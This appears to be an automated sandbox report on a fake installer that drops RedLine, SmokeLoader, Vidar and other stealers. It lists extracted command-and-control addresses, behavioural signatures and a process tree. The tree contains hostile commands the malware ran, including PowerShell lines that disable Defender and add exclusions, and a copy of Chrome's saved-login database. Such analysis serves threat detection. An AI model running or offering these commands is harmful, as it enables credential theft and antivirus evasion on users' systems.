Resubmissions
01-11-2021 20:09
211101-yw5kbaafg5 1001-11-2021 07:13
211101-h2lrdsdhhj 1001-11-2021 06:40
211101-hfpk6adhfj 1031-10-2021 18:27
211031-w3r7fsdafj 1031-10-2021 14:10
211031-rgstmscghm 1031-10-2021 08:02
211031-jxchlacefm 1031-10-2021 06:36
211031-hczxqacddp 1031-10-2021 06:23
211031-g5wv4affb3 10Analysis
-
max time kernel
50s -
max time network
1804s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
01-11-2021 20:09
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
4.5MB
-
MD5
3da25ccfa9c258e3ae26854391531c7b
-
SHA1
1ed5613b0ad8ab4c47f07e52199a4edd27be40e6
-
SHA256
62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720
-
SHA512
defed576df3d8325259884b485a0dc7cd673c47028e77f189255e27dca312a0befdc8dc84106cc3103a3027e67a835fad899f9361076a64831db144354a4618c
Malware Config
Extracted
redline
srtupdate33
135.181.129.119:4805
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6012 4124 rundll32.exe 121 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5516 4124 rundll32.exe 121 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7628 4124 rundll32.exe 121 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7308 4124 rundll32.exe 121 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral2/memory/1096-254-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/1096-255-0x0000000000418D3E-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000400000001abc7-145.dat family_socelars behavioral2/files/0x000400000001abc7-170.dat family_socelars -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/4308-493-0x0000000004830000-0x0000000004906000-memory.dmp family_vidar behavioral2/memory/4308-501-0x0000000000400000-0x0000000002BB8000-memory.dmp family_vidar -
resource yara_rule behavioral2/files/0x000400000001abba-123.dat aspack_v212_v242 behavioral2/files/0x000400000001abba-125.dat aspack_v212_v242 behavioral2/files/0x000400000001abb9-124.dat aspack_v212_v242 behavioral2/files/0x000400000001abb9-130.dat aspack_v212_v242 behavioral2/files/0x000400000001abb9-127.dat aspack_v212_v242 behavioral2/files/0x000400000001abbc-129.dat aspack_v212_v242 behavioral2/files/0x000400000001abbc-131.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 45 IoCs
pid Process 3988 setup_installer.exe 640 setup_install.exe 3344 Sun03d477f1a31.exe 2776 Sun03e4aeb7e43a1c.exe 956 Sun038db98f99bf9a.exe 888 Sun0397381f1f458e.exe 380 LzmwAqmV.exe 932 Sun033e271e0ce96c08.exe 2132 Sun039750b00c.exe 1284 Sun0324aba28588c0.exe 1944 Sun0328255c4bce6fb.exe 3000 Sun038aa349e3318e.exe 2116 Sun0351a0558292.exe 3684 Chrome5.exe 1732 Sun0397381f1f458e.exe 1020 Sun03f5d51697d04.exe 1120 Conhost.exe 2980 Sun03f5d51697d04.exe 3320 Sun03f5d51697d04.tmp 1096 Sun03f0dc4460bc9.exe 3116 HHEWEB3ov6jGwnrvTjcpFrSZ.exe 636 8kpeoLrqwpW7wAyFyeAmJmFl.exe 3980 postback.exe 3684 Chrome5.exe 4132 DownFlSetup110.exe 4252 WerFault.exe 4308 Soft1WW01.exe 4360 4.exe 4432 5.exe 4552 search_hyperfs_206.exe 4608 setup.exe 4832 chenxiulan-game.exe 4948 Calculator Installation.exe 5044 6.exe 4908 kPBhgOaGQk.exe 4856 2078851.exe 4252 WerFault.exe 896 6186893.exe 380 LzmwAqmV.exe 3092 8696598.exe 664 KEuBtY0DPKIhu_k6XWbRqXk1.exe 4976 msiexec.exe 2600 3187039.exe 1888 WinHoster.exe 1476 LYCw0J.ExE -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8696598.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6186893.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6186893.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8696598.exe -
Loads dropped DLL 12 IoCs
pid Process 640 setup_install.exe 640 setup_install.exe 640 setup_install.exe 640 setup_install.exe 640 setup_install.exe 640 setup_install.exe 640 setup_install.exe 1120 Conhost.exe 3320 Sun03f5d51697d04.tmp 4948 Calculator Installation.exe 4948 Calculator Installation.exe 4216 UPk9W6Mutc6xDMeNBuRsKHUt.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6186893.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8696598.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 97 freegeoip.app 99 freegeoip.app 100 freegeoip.app 103 freegeoip.app 268 ipinfo.io 333 ipinfo.io 36 ip-api.com 144 ipinfo.io 332 ipinfo.io 143 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 896 6186893.exe 3092 8696598.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 380 set thread context of 1096 380 LzmwAqmV.exe 91 -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Sun03f5d51697d04.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-G0I3U.tmp Sun03f5d51697d04.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Sun03f5d51697d04.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
pid pid_target Process procid_target 4264 932 WerFault.exe 107 2084 932 WerFault.exe 107 4796 932 WerFault.exe 107 380 932 WerFault.exe 107 1580 4608 WerFault.exe 130 4252 5044 WerFault.exe 136 4180 4608 WerFault.exe 130 4860 932 WerFault.exe 107 4376 4608 WerFault.exe 130 4032 4608 WerFault.exe 130 1076 932 WerFault.exe 107 4032 932 WerFault.exe 107 5500 4608 WerFault.exe 130 3120 5744 WerFault.exe 205 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Process not Found Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Process not Found Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Process not Found -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2988 schtasks.exe 1376 schtasks.exe 2700 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2232 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 7948 bitsadmin.exe -
Kills process with taskkill 11 IoCs
pid Process 7156 taskkill.exe 1508 taskkill.exe 1000 taskkill.exe 3660 taskkill.exe 6048 taskkill.exe 2124 taskkill.exe 6596 taskkill.exe 3100 taskkill.exe 4892 taskkill.exe 3300 taskkill.exe 8048 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 600 powershell.exe 596 powershell.exe 600 powershell.exe 600 powershell.exe 596 powershell.exe 596 powershell.exe 600 powershell.exe 3320 Sun03f5d51697d04.tmp 3320 Sun03f5d51697d04.tmp 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 4264 WerFault.exe 1284 Process not Found 1284 Process not Found 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 4796 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe 2084 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3028 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1284 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 3344 Sun03d477f1a31.exe Token: SeAssignPrimaryTokenPrivilege 3344 Sun03d477f1a31.exe Token: SeLockMemoryPrivilege 3344 Sun03d477f1a31.exe Token: SeIncreaseQuotaPrivilege 3344 Sun03d477f1a31.exe Token: SeMachineAccountPrivilege 3344 Sun03d477f1a31.exe Token: SeTcbPrivilege 3344 Sun03d477f1a31.exe Token: SeSecurityPrivilege 3344 Sun03d477f1a31.exe Token: SeTakeOwnershipPrivilege 3344 Sun03d477f1a31.exe Token: SeLoadDriverPrivilege 3344 Sun03d477f1a31.exe Token: SeSystemProfilePrivilege 3344 Sun03d477f1a31.exe Token: SeSystemtimePrivilege 3344 Sun03d477f1a31.exe Token: SeProfSingleProcessPrivilege 3344 Sun03d477f1a31.exe Token: SeIncBasePriorityPrivilege 3344 Sun03d477f1a31.exe Token: SeCreatePagefilePrivilege 3344 Sun03d477f1a31.exe Token: SeCreatePermanentPrivilege 3344 Sun03d477f1a31.exe Token: SeBackupPrivilege 3344 Sun03d477f1a31.exe Token: SeRestorePrivilege 3344 Sun03d477f1a31.exe Token: SeShutdownPrivilege 3344 Sun03d477f1a31.exe Token: SeDebugPrivilege 3344 Sun03d477f1a31.exe Token: SeAuditPrivilege 3344 Sun03d477f1a31.exe Token: SeSystemEnvironmentPrivilege 3344 Sun03d477f1a31.exe Token: SeChangeNotifyPrivilege 3344 Sun03d477f1a31.exe Token: SeRemoteShutdownPrivilege 3344 Sun03d477f1a31.exe Token: SeUndockPrivilege 3344 Sun03d477f1a31.exe Token: SeSyncAgentPrivilege 3344 Sun03d477f1a31.exe Token: SeEnableDelegationPrivilege 3344 Sun03d477f1a31.exe Token: SeManageVolumePrivilege 3344 Sun03d477f1a31.exe Token: SeImpersonatePrivilege 3344 Sun03d477f1a31.exe Token: SeCreateGlobalPrivilege 3344 Sun03d477f1a31.exe Token: 31 3344 Sun03d477f1a31.exe Token: 32 3344 Sun03d477f1a31.exe Token: 33 3344 Sun03d477f1a31.exe Token: 34 3344 Sun03d477f1a31.exe Token: 35 3344 Sun03d477f1a31.exe Token: SeDebugPrivilege 600 powershell.exe Token: SeDebugPrivilege 596 powershell.exe Token: SeDebugPrivilege 1944 Sun0328255c4bce6fb.exe Token: SeDebugPrivilege 3684 Chrome5.exe Token: SeDebugPrivilege 3100 taskkill.exe Token: SeRestorePrivilege 4264 WerFault.exe Token: SeBackupPrivilege 4264 WerFault.exe Token: SeDebugPrivilege 4132 DownFlSetup110.exe Token: SeDebugPrivilege 4360 4.exe Token: SeDebugPrivilege 4264 WerFault.exe Token: SeDebugPrivilege 4432 5.exe Token: SeDebugPrivilege 4796 WerFault.exe Token: SeDebugPrivilege 5044 6.exe Token: SeDebugPrivilege 2084 WerFault.exe Token: SeDebugPrivilege 380 LzmwAqmV.exe Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeShutdownPrivilege 3028 Process not Found Token: SeCreatePagefilePrivilege 3028 Process not Found Token: SeDebugPrivilege 3660 msdt.exe Token: SeDebugPrivilege 1096 Sun03f0dc4460bc9.exe Token: SeDebugPrivilege 4856 2078851.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3320 Sun03f5d51697d04.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3256 wrote to memory of 3988 3256 setup_x86_x64_install.exe 69 PID 3256 wrote to memory of 3988 3256 setup_x86_x64_install.exe 69 PID 3256 wrote to memory of 3988 3256 setup_x86_x64_install.exe 69 PID 3988 wrote to memory of 640 3988 setup_installer.exe 70 PID 3988 wrote to memory of 640 3988 setup_installer.exe 70 PID 3988 wrote to memory of 640 3988 setup_installer.exe 70 PID 640 wrote to memory of 4076 640 setup_install.exe 73 PID 640 wrote to memory of 4076 640 setup_install.exe 73 PID 640 wrote to memory of 4076 640 setup_install.exe 73 PID 640 wrote to memory of 3212 640 setup_install.exe 74 PID 640 wrote to memory of 3212 640 setup_install.exe 74 PID 640 wrote to memory of 3212 640 setup_install.exe 74 PID 640 wrote to memory of 4088 640 setup_install.exe 75 PID 640 wrote to memory of 4088 640 setup_install.exe 75 PID 640 wrote to memory of 4088 640 setup_install.exe 75 PID 640 wrote to memory of 3896 640 setup_install.exe 78 PID 640 wrote to memory of 3896 640 setup_install.exe 78 PID 640 wrote to memory of 3896 640 setup_install.exe 78 PID 640 wrote to memory of 1048 640 setup_install.exe 77 PID 640 wrote to memory of 1048 640 setup_install.exe 77 PID 640 wrote to memory of 1048 640 setup_install.exe 77 PID 640 wrote to memory of 3104 640 setup_install.exe 76 PID 640 wrote to memory of 3104 640 setup_install.exe 76 PID 640 wrote to memory of 3104 640 setup_install.exe 76 PID 640 wrote to memory of 2360 640 setup_install.exe 79 PID 640 wrote to memory of 2360 640 setup_install.exe 79 PID 640 wrote to memory of 2360 640 setup_install.exe 79 PID 640 wrote to memory of 2332 640 setup_install.exe 80 PID 640 wrote to memory of 2332 640 setup_install.exe 80 PID 640 wrote to memory of 2332 640 setup_install.exe 80 PID 640 wrote to memory of 588 640 setup_install.exe 84 PID 640 wrote to memory of 588 640 setup_install.exe 84 PID 640 wrote to memory of 588 640 setup_install.exe 84 PID 4076 wrote to memory of 600 4076 cmd.exe 82 PID 4076 wrote to memory of 600 4076 cmd.exe 82 PID 4076 wrote to memory of 600 4076 cmd.exe 82 PID 3212 wrote to memory of 596 3212 cmd.exe 83 PID 3212 wrote to memory of 596 3212 cmd.exe 83 PID 3212 wrote to memory of 596 3212 cmd.exe 83 PID 640 wrote to memory of 2592 640 setup_install.exe 81 PID 640 wrote to memory of 2592 640 setup_install.exe 81 PID 640 wrote to memory of 2592 640 setup_install.exe 81 PID 640 wrote to memory of 976 640 setup_install.exe 111 PID 640 wrote to memory of 976 640 setup_install.exe 111 PID 640 wrote to memory of 976 640 setup_install.exe 111 PID 4088 wrote to memory of 3344 4088 cmd.exe 110 PID 4088 wrote to memory of 3344 4088 cmd.exe 110 PID 4088 wrote to memory of 3344 4088 cmd.exe 110 PID 640 wrote to memory of 2024 640 setup_install.exe 85 PID 640 wrote to memory of 2024 640 setup_install.exe 85 PID 640 wrote to memory of 2024 640 setup_install.exe 85 PID 2360 wrote to memory of 2776 2360 cmd.exe 86 PID 2360 wrote to memory of 2776 2360 cmd.exe 86 PID 2360 wrote to memory of 2776 2360 cmd.exe 86 PID 2332 wrote to memory of 888 2332 mshta.exe 109 PID 2332 wrote to memory of 888 2332 mshta.exe 109 PID 2332 wrote to memory of 888 2332 mshta.exe 109 PID 976 wrote to memory of 956 976 cmd.exe 108 PID 976 wrote to memory of 956 976 cmd.exe 108 PID 976 wrote to memory of 956 976 cmd.exe 108 PID 3104 wrote to memory of 380 3104 cmd.exe 156 PID 3104 wrote to memory of 380 3104 cmd.exe 156 PID 3104 wrote to memory of 380 3104 cmd.exe 156 PID 3896 wrote to memory of 932 3896 cmd.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS49F59695\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun03d477f1a31.exeSun03d477f1a31.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3344 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:5228
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:6048
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun03f0dc4460bc9.exeSun03f0dc4460bc9.exe5⤵PID:380
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun039750b00c.exe4⤵PID:1048
-
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun039750b00c.exeSun039750b00c.exe5⤵
- Executes dropped EXE
PID:2132
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun033e271e0ce96c08.exeSun033e271e0ce96c08.exe /mixone5⤵
- Executes dropped EXE
PID:932 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 6606⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4264
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 6806⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 6766⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 6446⤵
- Program crash
PID:380
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 8926⤵
- Program crash
PID:4860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 9406⤵
- Program crash
PID:1076
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 11046⤵
- Program crash
PID:4032
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun03e4aeb7e43a1c.exeSun03e4aeb7e43a1c.exe5⤵
- Executes dropped EXE
PID:2776 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1950753026.exe"6⤵PID:4776
-
C:\Users\Admin\AppData\Local\Temp\1950753026.exe"C:\Users\Admin\AppData\Local\Temp\1950753026.exe"7⤵PID:4252
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2660404991.exe"6⤵PID:4248
-
C:\Users\Admin\AppData\Local\Temp\2660404991.exe"C:\Users\Admin\AppData\Local\Temp\2660404991.exe"7⤵PID:1560
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun03e4aeb7e43a1c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun03e4aeb7e43a1c.exe" & exit6⤵PID:7372
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun03e4aeb7e43a1c.exe" /f7⤵
- Kills process with taskkill
PID:1000
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe4⤵PID:2332
-
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun0397381f1f458e.exeSun0397381f1f458e.exe5⤵
- Executes dropped EXE
PID:888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe4⤵PID:2592
-
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun038aa349e3318e.exeSun038aa349e3318e.exe5⤵
- Executes dropped EXE
PID:3000 -
C:\Users\Admin\Pictures\Adobe Films\fLW_3tMO9VpDAo1xJvaRxmLY.exe"C:\Users\Admin\Pictures\Adobe Films\fLW_3tMO9VpDAo1xJvaRxmLY.exe"6⤵PID:5400
-
-
C:\Users\Admin\Pictures\Adobe Films\xSzrWrjPQ7132Mev12mh25X3.exe"C:\Users\Admin\Pictures\Adobe Films\xSzrWrjPQ7132Mev12mh25X3.exe"6⤵PID:5776
-
-
C:\Users\Admin\Pictures\Adobe Films\1JhbwNMbdOMDdfugF2HCONvO.exe"C:\Users\Admin\Pictures\Adobe Films\1JhbwNMbdOMDdfugF2HCONvO.exe"6⤵PID:5768
-
-
C:\Users\Admin\Pictures\Adobe Films\9xk8K_hVd_ZRPEszz8W5s8xf.exe"C:\Users\Admin\Pictures\Adobe Films\9xk8K_hVd_ZRPEszz8W5s8xf.exe"6⤵PID:5620
-
-
C:\Users\Admin\Pictures\Adobe Films\_tkn2z7fnqb8qqBHzogGBBSO.exe"C:\Users\Admin\Pictures\Adobe Films\_tkn2z7fnqb8qqBHzogGBBSO.exe"6⤵PID:5744
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:5472
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 4927⤵
- Program crash
PID:3120
-
-
-
C:\Users\Admin\Pictures\Adobe Films\73pzl9gP3DipmHRHxbFrlADY.exe"C:\Users\Admin\Pictures\Adobe Films\73pzl9gP3DipmHRHxbFrlADY.exe"6⤵PID:5752
-
-
C:\Users\Admin\Pictures\Adobe Films\YZmVKuDgBsVmo5izmcO0URBt.exe"C:\Users\Admin\Pictures\Adobe Films\YZmVKuDgBsVmo5izmcO0URBt.exe"6⤵PID:5740
-
-
C:\Users\Admin\Pictures\Adobe Films\10CO_GOtdSyDjsWvz6EZlhw5.exe"C:\Users\Admin\Pictures\Adobe Films\10CO_GOtdSyDjsWvz6EZlhw5.exe"6⤵PID:5732
-
-
C:\Users\Admin\Pictures\Adobe Films\CKjW6Zlo9p8UhUORpJO0ljAR.exe"C:\Users\Admin\Pictures\Adobe Films\CKjW6Zlo9p8UhUORpJO0ljAR.exe"6⤵PID:5724
-
-
C:\Users\Admin\Pictures\Adobe Films\KEuBtY0DPKIhu_k6XWbRqXk1.exe"C:\Users\Admin\Pictures\Adobe Films\KEuBtY0DPKIhu_k6XWbRqXk1.exe"6⤵
- Executes dropped EXE
PID:664 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵PID:5248
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵PID:6064
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xXgf39TElWQ4OH223QFnydoi.exe"C:\Users\Admin\Pictures\Adobe Films\xXgf39TElWQ4OH223QFnydoi.exe"6⤵PID:4900
-
C:\Windows\SysWOW64\msdt.exe"C:\Windows\SysWOW64\msdt.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3660 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\xXgf39TElWQ4OH223QFnydoi.exe"8⤵PID:5276
-
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V8⤵PID:652
-
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"8⤵PID:2752
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\i431fJ56YCeAg3zMXUhe_O3V.exe"C:\Users\Admin\Pictures\Adobe Films\i431fJ56YCeAg3zMXUhe_O3V.exe"6⤵PID:2636
-
-
C:\Users\Admin\Pictures\Adobe Films\FIrigjdc4BP4mHo1XYOxjuYq.exe"C:\Users\Admin\Pictures\Adobe Films\FIrigjdc4BP4mHo1XYOxjuYq.exe"6⤵PID:1940
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im FIrigjdc4BP4mHo1XYOxjuYq.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\FIrigjdc4BP4mHo1XYOxjuYq.exe" & del C:\ProgramData\*.dll & exit7⤵PID:6436
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im FIrigjdc4BP4mHo1XYOxjuYq.exe /f8⤵
- Kills process with taskkill
PID:7156
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:2232
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\AWsRNaMCHkkLFW_EvKfD48ps.exe"C:\Users\Admin\Pictures\Adobe Films\AWsRNaMCHkkLFW_EvKfD48ps.exe"6⤵PID:5720
-
